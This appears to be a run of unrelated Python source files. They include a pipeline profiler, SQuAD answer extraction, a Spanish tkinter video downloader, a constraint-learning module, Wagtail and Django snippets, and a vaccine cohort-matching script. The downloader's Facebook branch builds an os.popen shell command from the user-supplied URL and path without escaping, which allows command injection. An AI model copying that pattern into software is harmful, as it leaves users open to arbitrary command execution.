len(le.classes_)]) for i, pipeline in enumerate(pipelines): for j, primitive in enumerate(extract_primitive_names(pipeline)): idx_primitive = le.transform([primitive]) data_matrix[i, idx_primitive] = 1 return data_matrix, le.classes_ def extract_scores(pipelines): scores = [] for pipeline in pipelines: score = pipeline['scores'][0]['value'] scores.append(score) return np.array(scores) def rename_pipelines(pipelines): sourceMap = defaultdict(lambda: 1) for pipeline in pipelines: source = pipeline['pipeline_source']['name'] pipeline['pipeline_source']['name'] = '{} #{}'.format(source, sourceMap[source]) sourceMap[source] += 1 def transform_module_type(module_type): map = { 'feature_extraction': 'Feature Extraction', 'learner': 'Classification', 'normalization': 'Preprocessing', 'feature_construction': 'Feature Selection', 'classification': 'Classification', 'data_transformation': 'Preprocessing', 'schema_discovery': 'Preprocessing', 'data_preprocessing': 'Preprocessing', 'data_cleaning': 'Preprocessing', 'regression': 'Regression', 'operator': 'Operator', 'feature_selection': 'Feature Selection', 'semisupervised_classification': 'Classification', 'natural_language_processing': 'NLP', 'time_series_forecasting': 'Forecasting', 'time_series_classification': 'TS Classification', 'time_series_segmentation': 'Feature Extraction' } if module_type in map: return map[module_type] else: return ' '.join([n.capitalize() for n in module_type.split("_")]) def extract_primitive_info(pipelines, enet_alpha, enet_l1): module_matrix, module_names = extract_module_matrix(pipelines) scores = extract_scores(pipelines) infos = {} module_types = set() for pipeline in pipelines: for step in pipeline['steps']: python_path = step['primitive']['python_path'] if python_path in infos: continue split = python_path.split(".") module_desc = step['primitive']['name'] module_type = transform_module_type(split[2]) module_types.add(module_type) module_name = split[3] infos[python_path] = { "module_desc": module_desc, "module_type": module_type, "module_name": module_name, } return infos, module_types def extract_d3m_time_metric(pipelines): for pipeline in pipelines: if 'end' in pipeline and 'start' in pipeline: # using D3M prediction time format diff = parse(pipeline['end']) - parse(pipeline['start']) diff_sec = diff.total_seconds() pipeline['scores'].append({ 'metric': {'metric': 'PRED TIME (s)'}, 'normalized': diff_sec, 'value': diff_sec, }) def compute_metric_map(pipelines): for pipeline in pipelines: pipeline['score_map'] = {} for score in pipeline['scores']: pipeline['score_map'][score['metric']['metric']] = score def prepare_data_pipeline_matrix(pipelines, enet_alpha=0.001, enet_l1=0.1): pipelines = copy.deepcopy(pipelines) extract_d3m_time_metric(pipelines) compute_metric_map(pipelines) pipelines = sorted(pipelines, key=lambda x: x['scores'][0]['normalized'], reverse=True) rename_pipelines(pipelines) info, module_types = extract_primitive_info(pipelines, enet_alpha=enet_alpha, enet_l1=enet_l1) data = { "infos": info, "pipelines": pipelines, "module_types": list(module_types), } return data def get_pipeline_profiler_html(pipelines): id = id_generator() data_dict = prepare_data_pipeline_matrix(pipelines) html_all = make_html(data_dict, id) return html_all def plot_pipeline_matrix(pipelines): from IPython.core.display import display, HTML id = id_generator() data_dict = prepare_data_pipeline_matrix(pipelines) html_all = make_html(data_dict, id) display(HTML(html_all))
# Copyright 2022 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """get predictions for squad""" import math import collections def get_prelim_predictions(features, unique_id_to_result, n_best_size, max_answer_length): """get prelim predictions""" _PrelimPrediction = collections.namedtuple( "PrelimPrediction", ["feature_index", "start_index", "end_index", "start_logit", "end_logit"]) prelim_predictions = [] # keep track of the minimum score of null start+end of position 0 for (feature_index, feature) in enumerate(features): if feature.unique_id not in unique_id_to_result: continue result = unique_id_to_result[feature.unique_id] start_indexes = _get_best_indexes(result.start_logits, n_best_size) end_indexes = _get_best_indexes(result.end_logits, n_best_size) # if we could have irrelevant answers, get the min score of irrelevant for start_index in start_indexes: for end_index in end_indexes: # We could hypothetically create invalid predictions, e.g., predict # that the start of the span is in the question. We throw out all # invalid predictions. if start_index >= len(feature.tokens): continue if end_index >= len(feature.tokens): continue if start_index not in feature.token_to_orig_map: continue if end_index not in feature.token_to_orig_map: continue if not feature.token_is_max_context.get(start_index, False): continue if end_index < start_index: continue length = end_index - start_index + 1 if length > max_answer_length: continue prelim_predictions.append( _PrelimPrediction( feature_index=feature_index, start_index=start_index, end_index=end_index, start_logit=result.start_logits[start_index], end_logit=result.end_logits[end_index])) prelim_predictions = sorted( prelim_predictions, key=lambda x: (x.start_logit + x.end_logit), reverse=True) return prelim_predictions def get_nbest(args, prelim_predictions, features, example, n_best_size, do_lower_case): """get nbest predictions""" _NbestPrediction = collections.namedtuple( "NbestPrediction", ["text", "start_logit", "end_logit"]) seen_predictions = {} nbest = [] for pred in prelim_predictions: if len(nbest) >= n_best_size: break feature = features[pred.feature_index] if pred.start_index > 0: # this is a non-null prediction tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)] final_text = args.tokenizer.convert_tokens_to_string(tok_tokens).strip() if final_text in seen_predictions: continue seen_predictions[final_text] = True else: final_text = "" seen_predictions[final_text] = True nbest.append( _NbestPrediction( text=final_text, start_logit=pred.start_logit, end_logit=pred.end_logit)) # In very rare edge cases we could have no valid predictions. So we # just create a nonce prediction in this case to avoid failure. if not nbest: nbest.append(_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0)) assert len(nbest) >= 1 return nbest def get_predictions(args, all_examples, all_features, all_results, n_best_size, max_answer_length, do_lower_case): """Get final predictions""" print("start to get predictions") example_index_to_features = collections.defaultdict(list) for feature in all_features: example_index_to_features[feature.example_index].append(feature) unique_id_to_result = {} for result in all_results: unique_id_to_result[result.unique_id] = result all_predictions = collections.OrderedDict() for (example_index, example) in enumerate(all_examples): features = example_index_to_features[example_index] prelim_predictions = get_prelim_predictions(features, unique_id_to_result, n_best_size, max_answer_length) nbest = get_nbest(args, prelim_predictions, features, example, n_best_size, do_lower_case) total_scores = [] best_non_null_entry = None for entry in nbest: total_scores.append(entry.start_logit + entry.end_logit) if not best_non_null_entry: if entry.text: best_non_null_entry = entry probs = _compute_softmax(total_scores) nbest_json = [] for (i, entry) in enumerate(nbest): output = collections.OrderedDict() output["text"] = entry.text output["probability"] = probs[i] output["start_logit"] = entry.start_logit output["end_logit"] = entry.end_logit nbest_json.append(output) assert len(nbest_json) >= 1 all_predictions[example.qas_id] = nbest_json[0]["text"] return all_predictions def write_predictions(args, all_examples, all_features, all_results, n_best_size, max_answer_length, do_lower_case): """Write final predictions to the json file and log-odds of null if needed.""" all_predictions = get_predictions(args, all_examples, all_features, all_results, n_best_size, max_answer_length, do_lower_case) return all_predictions def _get_best_indexes(logits, n_best_size): """Get the n-best logits from a list.""" index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True) best_indexes = [] for (i, score) in enumerate(index_and_score): if i >= n_best_size: break best_indexes.append(score[0]) return best_indexes def _compute_softmax(scores): """Compute softmax probability over raw logits.""" if not scores: return [] max_score = None for score in scores: if max_score is None or score > max_score: max_score = score exp_scores = [] total_sum = 0.0 for score in scores: x = math.exp(score - max_score) exp_scores.append(x) total_sum += x probs = [] for score in exp_scores: probs.append(score / total_sum) return probs
# /usr/bin/env python # -*- coding: utf-8 -*- # -*- encoding: utf-8 -*- """ Clase que controla los eventos del downloader además de las descargas de los videos y audios """ # __author__=jjr4p from io import BytesIO from PIL import ImageTk from PIL.Image import open as opp from tkinter import Toplevel, NORMAL, DISABLED, END, INSERT, TclError, IntVar from tkinter import messagebox as msg from tkinter import ttk from tkinter import filedialog import pafy import requests import os import threading import platform class Controlador: def setVista(self, vista): """ Define la vista que será controlada """ self.vista = vista self.recurso = None def cargarurl(self): """ Método encargado de llamar al método cargarInfo en un hilo distinto """ self.vista.button.config(state=DISABLED) self.vista.bvideo.config(state=DISABLED) self.vista.baudio.config(state=DISABLED) self.vista.bborrar.config(state=DISABLED) if platform.system() == 'Windows': self.vista.config(cursor="wait") if "facebook" in self.vista.url.get(): self.t = threading.Thread(target=self.cargarFB) self.t.start() else: try: self.recursoPL = pafy.get_playlist(self.vista.url.get()) self.t = threading.Thread(target=self.cargarPlayList) self.t.start() except ValueError as e: try: self.recurso = pafy.new(self.vista.url.get()) self.t = threading.Thread(target=self.cargarInfo) self.t.start() except ValueError as e: mensaje = "La url es inválida o no se encuentra conectado " mensaje += "a internet, intentelo nuevamente." msg.showerror("Error", mensaje) self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def cargarInfo(self): self.vista.notebook.select(self.vista.tab1) """ Método encargado de obtener información dela url ingresada """ info = "" info += "■Título: " + self.recurso.title+"\n" info += "■Duración: " + self.recurso.duration+"\n" info += "■Autor: " + self.recurso.author+"\n" try: info += "■Categoría: " + self.recurso.category+"\n" except: info += "■Categoría: No disponible\n" pass info += "■Likes: " + str(self.recurso.likes)+"\n" info += "■Dislikes: " + str(self.recurso.dislikes)+"\n" mejor = self.recurso.getbest() info += "■Mejor resolución: " + mejor.resolution+"\n" info += "■Mejor formato: " + mejor.extension if self.recurso.bigthumb != '': response = requests.get(self.recurso.bigthumb) img_data = response.content img = ImageTk.PhotoImage(opp(BytesIO(img_data))) self.vista.imagen.config(text="", image=img) self.vista.imagen.image = img self.vista.text.config(state=NORMAL) self.vista.text.delete(1.0, END) self.vista.text.insert(INSERT, info) self.vista.text.config(state=DISABLED) self.cargarLista() self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def cargarLista(self): """ Método encargado de obtener los formatos disponibles del video que se busca """ self.streams = self.recurso.streams self.vista.listbox.delete(0, END) i = 0 texto_a_insertar = "{}) Resolución: {}, Extensión: {}, Tamaño: {}" for s in self.streams: i += 1 tamanio = str("%.2f MB." % (s.get_filesize()/(1024**2))) self.vista.listbox.insert(END, texto_a_insertar.format( i, s.resolution, s.extension, tamanio)) def descargaVideo(self): """ Método encargado de llamar al método __descargaVideo, según lo seleccionado por el usuario además que se ejecuta en un hilo distinto """ index = self.vista.listbox.curselection() if len(index) > 0: self.seleccion = self.streams[index[0]] self.size = self.seleccion.get_filesize() self.mostrarDialogo() t = threading.Thread(target=self.__descargarVideo) t.start() self.vista.button.config(state=DISABLED) self.vista.bvideo.config(state=DISABLED) self.vista.baudio.config(state=DISABLED) self.vista.bborrar.config(state=DISABLED) else: msg.showerror("Error", "Se debe seleccionar un video de la lista.") def __descargarVideo(self): """ Método que descarga el video seleccionado y muestra la carga """ self.d = True try: file = self.seleccion.download( quiet=True, filepath=self.vista.path.get(), callback=self.callback) except Exception as e: raise e msg.showerror("Error", "El archivo ya existe.") self.top.destroy() self.d = False msg.showinfo("Mensaje", "Archivo descargado correctamente") self.vista.text.config(state=NORMAL) self.vista.text.delete(1.0, END) self.vista.text.config(state=DISABLED) self.vista.listbox.delete(0, END) self.vista.url.set("") self.vista.imagen.config(text="No disponible", image='') self.vista.imagen.image = '' self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.config(cursor='') self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def descargaAudio(self): """ Método encargado de llamar al método __descargaAudio, que descarga la mejor resolución de audio, además que se ejecuta en un hilo distinto """ if self.recurso != None: t = threading.Thread(target=self.__descargaAudio) t.start() self.vista.button.config(state=DISABLED) self.vista.bvideo.config(state=DISABLED) self.vista.baudio.config(state=DISABLED) self.vista.bborrar.config(state=DISABLED) self.mostrarDialogo() def __descargaAudio(self): """ Método que descarga el video seleccionado y muestra la carga """ self.bestaudio = self.recurso.getbestaudio(preftype='m4a') if self.bestaudio != None: self.d = True self.fileaudio = self.bestaudio.title+".m4a" self.size = self.bestaudio.get_filesize() try: self.bestaudio.download( quiet=True, callback=self.callback, filepath=self.vista.path.get()) msg.showinfo("Mensaje", "Archivo descargado correctamente.") except Exception as e: msg.showerror("Error", "El archivo ya existe.") self.top.destroy() self.d = False self.vista.text.config(state=NORMAL) self.vista.text.delete(1.0, END) self.vista.text.config(state=DISABLED) self.vista.listbox.delete(0, END) self.vista.url.set("") self.vista.imagen.config(text="No disponible", image='') self.vista.imagen.image = '' self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.config(cursor='') self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def mostrarDialogo(self): """ Método que muestra la GUI de descarga del archivo """ self.top = Toplevel(self.vista) self.top.resizable(0, 0) self.top.iconbitmap('descarga.ico') geometry = "400x150+" geometry = "400x250+" geometry += str(int(self.vista.ancho/2)-150)+"+" geometry += str(int(self.vista.alto/2)-50) self.top.geometry(geometry) self.top.title("Descarga en progreso...") self.label = Label(self.top, text="Descargando: ", font=("Arial", 13)) self.label.place(x=5, y=15) self.label2 = Label(self.top, text="Tiempo: ", font=("Arial", 13)) self.label2.place(x=130, y=15) self.label3 = Label(self.top, text="Vel.: ", font=("Arial", 13)) self.label3.place(x=250, y=15) self.progress = IntVar() self.progress.set(0) self.progressbar = ttk.Progressbar(self.top, variable=self.progress) self.progressbar.place(x=30, y=60, width=320) self.bcancelar = ttk.Button(self.top, text="Cancelar") self.bcancelar.place(x=150, y= 100) self.top.iconbitmap('descarga.ico') self.progress = IntVar() self.progress.set(0) self.progressbar = ttk.Progressbar(self.top, variable=self.progress) self.label = ttk.Label(self.top, text="Descargando: ", font=("Arial", 14)) self.label.place(x=5, y=15) self.label2 = ttk.Label(self.top, text="Tiempo restante: ", font=("Arial", 14)) self.label2.place(x=5, y=65) self.label3 = ttk.Label(self.top, text="Velocidad: ", font=("Arial", 14)) self.label3.place(x=5, y=115) self.progressbar.place(x=30, y=160, width=320) if platform.system() == 'Windows': self.vista.config(cursor="wait") self.bcancelar = ttk.Button(self.top, text="cancelar", command=self.cancelar) self.bcancelar.place(x=150,y=200) self.top.transient(self.vista) self.top.config(bg="#4C4C4D") def iniciar(self): """ Método que muestra la GUI """ self.vista.mainloop() def cancelar(self): pass def borrarurl(self): """ Método borra la url ingresada """ self.vista.url.set("") def callback(self, total, recvd, ratio, rate, eta): """ Método que controla la descarga del archivo """ carga = int(ratio*100) self.progressbar.step(carga - self.progress.get()) self.progress.set(carga) self.label.config(text="Descarga: "+str(carga)+" %") self.label2.config(text="Tiempo restante: "+str("%.0f" % (eta))+" segundos") self.label3.config(text="Velocidad: "+str("%.2f" % (rate/1024))+" Mb/s") def cambiaPath(self): """ Método para cambiar la carpeta destino """ path = filedialog.askdirectory() if path != None and path != '': self.vista.path.set(path) def copia(self, event): """ Método que pega la url del portapapeles """ self.vista.url.set(self.vista.clipboard_get()) def cargarPlayList(self): self.vista.notebook.select(self.vista.tabPL) self.disponibles = self.recursoPL['items'] self.vista.listPL.delete(0, END) i = 0 texto_a_insertar = "{}) Título: {}, Duración: {}" for s in self.disponibles: i += 1 insertar = texto_a_insertar.format(i, s['pafy'].title[:40]+"...", s['pafy'].duration) try: self.vista.listPL.insert(END,insertar) except TclError as e: pass self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="") def cargarInfoDesdePL(self): index = self.vista.listPL.curselection() if len(index) > 0: if platform.system() == 'Windows': self.vista.config(cursor="wait") self.recurso = self.recursoPL['items'][index[0]]['pafy'] self.vista.button.config(state=DISABLED) self.vista.bvideo.config(state=DISABLED) self.vista.baudio.config(state=DISABLED) self.vista.bborrar.config(state=DISABLED) self.t = threading.Thread(target=self.cargarInfo) self.t.start() else: msg.showerror("Error", "Se debe seleccionar un video de la lista.") def cargarFB(self): try: rpta = msg.askyesno("Pregunta", "No se puede obtener información "+ "de un video de facebook, desea continuar con la descarga?") if rpta: path = filedialog.asksaveasfilename() os.popen("facebook-dl.py {} hd {}".format(self.vista.url.get(),path)) msg.showinfo("Mensaje", "Archivo descargado correctamente.") except: msg.showerror("Error", "El video no es público, o la url es inválida.") self.vista.button.config(state=NORMAL) self.vista.bvideo.config(state=NORMAL) self.vista.baudio.config(state=NORMAL) self.vista.bborrar.config(state=NORMAL) self.vista.config(cursor="")
import abc import logging import operator import warnings from fractions import Fraction from typing import List, Sequence, Optional, Tuple import numpy as np # type: ignore import pandas as pd # type: ignore from pathos.pools import ProcessPool import statsmodels.api as sm # type: ignore import statsmodels.tools.sm_exceptions as sm_exc import sympy as sym from mockdown.constraint import IConstraint from mockdown.learning.noisetolerant.types import NoiseTolerantLearningConfig from mockdown.learning.types import IConstraintLearning, ConstraintCandidate from mockdown.model import IView from mockdown.types import unopt, PROFILE logger = logging.getLogger(__name__) class NoiseTolerantLearning(IConstraintLearning): def __init__(self, templates: Sequence[IConstraint], samples: List[IView[sym.Number]], config: Optional[NoiseTolerantLearningConfig] = None) -> None: self.templates = [tpl for tpl in templates if tpl.op is operator.eq] self.samples = samples if not config: config = NoiseTolerantLearningConfig(sample_count=len(samples)) self.config = config def learn(self) -> List[List[ConstraintCandidate]]: if False: # len(self.templates) >= 100 and not PROFILE: # profiler can't see inside multiprocessing with ProcessPool() as pool: return list(pool.map(self.learn_one, self.templates)) else: return list(map(self.learn_one, self.templates)) def learn_one(self, template) -> List[ConstraintCandidate]: data = self._template_data(template) model = NoiseTolerantTemplateModel(template, data, self.config) return model.learn() if not model.reject() else [] def _template_data(self, template: IConstraint) -> pd.DataFrame: """Extract the data for a given template from the samples.""" if template.kind.is_constant_form: columns = [template.y_id] else: columns = [template.y_id, unopt(template.x_id)] rows = [] for sample in self.samples: rows.append([unopt(sample.find_anchor(col)).value for col in columns]) return pd.DataFrame(rows, columns=list(map(str, columns)), dtype=np.float) class NoiseTolerantTemplateModel(abc.ABC): def __init__(self, template: IConstraint, data: pd.DataFrame, config: NoiseTolerantLearningConfig): self.template = template self.data = data self.config = config # todo: add synthetic extra data point in 1-ex case. x = sm.add_constant(self.x_data, has_constant='add') y = self.y_data kind = self.template.kind sc = self.config.sample_count # If we only have one example, append the sensible default which preserves # the simple learning behavior. This is not well-defined (or necessary) when # we have been given two samples. if self.config.sample_count == 1: if kind.is_constant_form: x.loc[sc] = [1, 0] y.loc[sc] = y.loc[0] elif kind.is_mul_only_form: x.loc[sc] = [1, 0] y.loc[sc] = 0 elif kind.is_add_only_form: x.loc[sc] = [1, 0] y.loc[sc] = y.loc[0] - x[self.x_name].loc[0] else: # full y = a x + b form... raise Exception("A general form constraint should not be instantiated for only one example!") """ This is an absolutely horrendous hack. Basically, due to numerical error, sometimes the noise here isn't quite enough, and statsmodels will throw a PerfectSeparationError. (Context: statsmodels doesn't handle the perfect fit case, so we add very tiny noise to get around that limitation.) If so... we just try again. """ while True: try: x_smudged, y_smudged = self._smudge_data(x, y) self.model = sm.GLM(y_smudged, x_smudged) with warnings.catch_warnings(): """ What's up with these fit_constrained calls? fit_constraints((R, q)) solves such that R params = q. The order of R is (k, a_1, ..., a_n), where the regression is a_1*x_1 + ... a_n*x_n + k. For our purposes (y = a x + b) R corresponds to (b, a). For a constant form (y = b) it must hold that: - (0 * b) + (1 * a) = 0 That is: - 0 * b = 0 (trivially always holds, unconstrained) - 1 * a = 0 (multiplier must be zero.) For a multiplicative form (y = a x) it must hold that: - (1 * b) + (0 * a) = 0 That is: - 1 * b = 0 (constant must be zero.) - 0 * a = 0 (trivially always holds, unconstrained) for an additive form (y = a x + b) it must hold that: - (0 * b) + (1 * a) = 1 That is: - 1 * a = 1 (multiplier must be 1) """ # To ignore a harmless warning from statsmodels. – Dylan warnings.simplefilter("ignore") if kind.is_constant_form: self.fit = self.model.fit_constrained(((0, 1), 0)) elif kind.is_mul_only_form: self.fit = self.model.fit_constrained(((1, 0), 0)) elif kind.is_add_only_form: self.fit = self.model.fit_constrained(((0, 1), 1)) else: # full y = a x + b form... self.fit = self.model.fit() except sm_exc.PerfectSeparationError: logger.warn(f"Perfect separation error for {self.template}f with data:\n{self.data}") continue else: break def _smudge_data(self, x, y): x_noise = np.random.randn(len(x)) * 1e-5 x_smudged = x.add(x_noise, axis=0) y_noise = np.random.randn(len(y)) * 1e-5 y_smudged = y.add(y_noise, axis=0) return x_smudged, y_smudged @property def x_name(self) -> str: return str(self.template.x_id) if self.template.x_id else '__dummy__' @property def y_name(self) -> str: return str(self.template.y_id) @property def x_data(self) -> pd.Series: if self.template.kind.is_constant_form: return pd.Series(np.zeros(self.config.sample_count), name=self.x_name) return self.data[self.x_name] @property def y_data(self) -> pd.Series: return self.data[self.y_name] def likelihood_score(self, a: int, b: Fraction, scale=1) -> float: return self.model.loglike((b, a), scale=scale) def candidates(self) -> pd.DataFrame: a_space, b_space = self.config.a_space, self.config.b_space aconf_l, aconf_u = self.a_confint() bconf_l, bconf_u = self.b_confint() a_cands_ixs = np.where(np.logical_and(aconf_l <= a_space, a_space <= aconf_u))[0] if len(a_cands_ixs) == 0: # The confidence interval is _between_ two candidates, find its upper/lower candidate bounds. a_ix = np.searchsorted(a_space, (aconf_l + aconf_u) / 2) a_cands_ixs = [max(0, a_ix - 1), min(a_ix, len(a_space) - 1)] a_cands = a_space[a_cands_ixs] b_cands_ixs = np.where(np.logical_and(bconf_l <= b_space, b_space <= bconf_u))[0] if len(b_cands_ixs) == 0: # The confidence interval is _between_ two candidates, find its upper/lower candidate bounds. b_ix = np.searchsorted(b_space, (bconf_l + bconf_u) / 2) b_cands_ixs = [max(0, b_ix - 1), min(b_ix, len(b_space) - 1)] b_cands = b_space[b_cands_ixs] return pd.DataFrame([(a, b) for a in a_cands for b in b_cands], columns=['a', 'b']) def learn(self) -> List[ConstraintCandidate]: candidates = self.candidates() # scale = 1 candidates['glm_loglike'] = candidates.apply(lambda c: self.likelihood_score(*c), axis=1) candidates['glm_score'] = np.exp(candidates['glm_loglike']) candidates['glm_score'] /= candidates['glm_score'].sum() candidates['pri_score'] = self.a_prior(candidates['a']) candidates['pri_score'] /= candidates['pri_score'].sum() candidates['score'] = candidates['glm_score'] * candidates['pri_score'] candidates['log_score'] = np.log(candidates['score']) logger.debug(f"CANDIDATES:\n{candidates}") return list(candidates.apply(lambda row: ConstraintCandidate( self.template.subst(a=sym.Rational(row['a']), b=sym.Rational(row['b'])), row['score']), axis=1)) def reject(self) -> bool: x, y = self.x_data, self.y_data if np.var(x) == 0 and not np.std(y) < self.config.cutoff_spread: logger.debug( f"REJECTED: `{self.template}`, no x variance and stdev of y is too high: " f"{np.std(y)} > {self.config.cutoff_spread}") logger.debug(f"Data:\n{self.data}") return True if np.var(y) == 0 and not np.std(x) < self.config.cutoff_spread: logger.debug( f"REJECTED: `{self.template}`, no y variance and stdev of x is too high: " f"{np.std(x)} > {self.config.cutoff_spread}") logger.debug(f"Data:\n{self.data}") return True # Are the residuals small? resid_std = np.std(self.fit.resid_response) if resid_std > self.config.cutoff_spread: logger.debug( f"REJECTED: `{self.template}`, stdev of residuals too high: {resid_std} > {self.config.cutoff_spread}") logger.debug(f"Data:\n{self.data}") return True self._log_accepted() return False def a_confint(self) -> Tuple[float, float]: # max_d = self.config.max_denominator al, au = self.fit.conf_int(alpha=self.config.a_alpha).iloc[1] return al, au def b_confint(self) -> Tuple[float, float]: bl, bu = self.fit.conf_int(alpha=self.config.b_alpha).iloc[0] return bl, bu def a_prior(self, a: np.ndarray) -> float: return self.config.depth_prior[np.searchsorted(self.config.a_space, a)] def _log_accepted(self) -> None: a_bounds_str: str al, au = self.a_confint() a_bounds_str = f"= {al}" if al == au else f"∈ [{al}, {au}]" bl, bu = self.b_confint() b_bounds_str = f"= {bl}" if bl == bu else f"∈ [{bl}, {bu}]" logger.debug(f"ACCEPTED: `{self.template}`") logger.debug(f"DATA:\n{self.data}") logger.debug(f"BOUNDS: a {a_bounds_str}, b {b_bounds_str}")
from django.utils.html import escape from wagtail.core.models import Page class PageLinkHandler: """ PageLinkHandler will be invoked whenever we encounter an <a> element in HTML content with an attribute of data-linktype="page". The resulting element in the database representation will be: <a linktype="page" id="42">hello world</a> """ @staticmethod def get_db_attributes(tag): """ Given an <a> tag that we've identified as a page link embed (because it has a data-linktype="page" attribute), return a dict of the attributes we should have on the resulting <a linktype="page"> element. """ return {'id': tag['data-id']} @staticmethod def expand_db_attributes(attrs): try: page = Page.objects.get(id=attrs['id']) attrs = 'data-linktype="page" data-id="%d" ' % page.id parent_page = page.get_parent() if parent_page: attrs += 'data-parent-id="%d" ' % parent_page.id return '<a %shref="%s">' % (attrs, escape(page.specific.url)) except Page.DoesNotExist: return "<a>" def page_linktype_handler(attrs): try: page = Page.objects.get(id=attrs['id']) return '<a href="%s">' % escape(page.specific.url) except Page.DoesNotExist: return "<a>"
from django.conf.urls import * from profiles import views urlpatterns = patterns('', url(r'^(?P<username>[\w@.-]+)/$', views.profile_detail, {'template_name': 'profiles/public/profile_detail.html'}, name='profiles_profile_detail'), )
''' After data is prepared, apply the cohort conditions and the matching process. The data generated by this class are composed by two files: - Table of pairs with the date of the events of interest. - Table containing general information of all individuals considered for the matching process (the individuals in the first table forms a subset of this table). ''' import numpy as np import pandas as pd import datetime as dt from tqdm import tqdm import lib.aux_utils as aux import lib.utils as utils import lib.matching_utils as matching_utils from collections import defaultdict from dateutil.relativedelta import relativedelta col_tests = ["Data da Solicitação(GAL)", "Data da Coleta(GAL)"] class DefineCohortSettings: def __init__(self, vacineja_df, init_cohort, final_cohort): ''' Description. Args: vacineja_df: pandas.DataFrame. init_cohort: datetime.date. final_cohort: datetime.date. ''' self.vacineja_df = vacineja_df.copy() self.init_cohort = init_cohort self.final_cohort = final_cohort def define_eligibility(self, partial=14, fully=14, return_=True): ''' Define new columns in the 'Vacine Já' database regarding the eligibility criteria to an individual be part of the cohort. Args: partial: Integer. fully: Integer. return_: Bool. Return: self.vacineja_df. If return_=True. ''' subset = ["data D1(VACINADOS)", "data D2(VACINADOS)"] self.vacineja_df["VACINA STATUS - COORTE"] = self.vacineja_df[subset].apply(lambda x: aux.f_when_vaccine(x, self.init_cohort, self.final_cohort), axis=1) self.vacineja_df["IMUNIZACAO MAXIMA ATE FIM DA COORTE"] = self.vacineja_df[subset].apply(lambda x: aux.f_immunization(x, self.init_cohort, self.final_cohort, partial, fully), axis=1) # --> Eligibility by tests subset = ["Data da Solicitação(GAL)", "Data da Coleta(GAL)", "RESULTADO FINAL GAL-INTEGRASUS"] self.vacineja_df["ELIGIBILIDADE TESTE"] = self.vacineja_df[subset].apply(lambda x: aux.f_eligible_test(x, self.init_cohort, self.final_cohort), axis=1) subset = "IMUNIZACAO MAXIMA ATE FIM DA COORTE" aptos = ["NAO VACINADO", "PARCIALMENTE IMUNIZADO", "TOTALMENTE IMUNIZADO", "VACINADO SEM IMUNIZACAO"] self.vacineja_df["ELIGIBILIDADE COORTE GERAL"] = self.vacineja_df[subset].apply(lambda x: "APTO" if x in aptos else "NAO APTO") # --> Eligibility for cases partial self.vacineja_df["ELIGIBILIDADE EXPOSTO PARCIAL"] = self.vacineja_df[subset].apply(lambda x: "APTO" if x=="PARCIALMENTE IMUNIZADO" else "NAO APTO") # --> Eligibility for cases fully self.vacineja_df["ELIGIBILIDADE EXPOSTO TOTAL"] = self.vacineja_df[subset].apply(lambda x: "APTO" if x=="TOTALMENTE IMUNIZADO" else "NAO APTO") # --> Create column with age based on the final of cohort. self.vacineja_df["idade"] = self.vacineja_df["data_nascimento"].apply(lambda x: relativedelta(self.final_cohort, x.date()).years) self.vacineja_df = self.vacineja_df.drop_duplicates(subset=["cpf"], keep="first") if return_: return self.vacineja_df def dynamical_matching(self, vaccine="CORONAVAC", age_thr=18, verbose=False, seed=0): ''' Perform the matching mechanism to find the case-control pairs. After selecting all individuals who took the specified vaccine at a day during cohort, we find for each day all possible controls for the cases. Matching is performed using sex and age variables. Args: vaccine: String. {"CORONAVAC", "ASTRAZENECA", "PFIZER"}. Vaccine to consider during matching for the cases. age_thr: Integer. Minimum age to consider during matching. verbose: Bool. seed: Integer. Random seed to change the order of possible control candidates. final_cohort: datetime.date. Return: events_df: df_pop: ''' if "ELIGIBILIDADE TESTE" not in self.vacineja_df.columns: return -1 datelst = utils.generate_date_list(self.init_cohort, self.final_cohort) # --> APPLY ESSENTIAL FILTERS # First, consider only people with age older or equal to 'age_thr' years old. df = self.vacineja_df[self.vacineja_df["idade"]>=age_thr] df = df[(df["OBITO INCONSISTENCIA COVID"]!="S") & (df["OBITO INCONSISTENCIA CARTORIOS"]!="S")] df = df[df["data aplicacao consistente(VACINADOS)"]!="N"] # Filter by eligibility df = df[(df["ELIGIBILIDADE TESTE"]=="APTO") & (df["ELIGIBILIDADE COORTE GERAL"]=="APTO")] # Obtain set of vaccinated and unvaccinated individuals. df_vaccinated = df[df["vacina(VACINADOS)"]==vaccine].dropna(subset=["data D1(VACINADOS)"], axis=0) df_unvaccinated = df[pd.isna(df["vacina(VACINADOS)"])] if verbose: print(f"Dimensão de elegíveis após aplicacão das condições: {df.shape}") print(f"Número restante de óbitos: {df['data_obito(OBITO COVID)'].notnull().sum()}") #print(f"Número restante de hospitalizados: {df['DATA HOSPITALIZACAO'].notnull().sum()}") #print(f"Número restante de testes: {df['DATA SOLICITACAO(TESTES)'].notnull().sum()}") print(f"Número de vacinados elegíveis para {vaccine}: {df_vaccinated.shape[0]}") # -- CREATE CONTROL RESERVOIR -- control_used = defaultdict(lambda: False) control_reservoir = defaultdict(lambda:[]) control_dates = { "D1": defaultdict(lambda:-1), "D2": defaultdict(lambda:-1), "DEATH COVID": defaultdict(lambda:-1), "DEATH GENERAL": defaultdict(lambda:-1) } df_pop = pd.concat([df_vaccinated, df_unvaccinated]) if 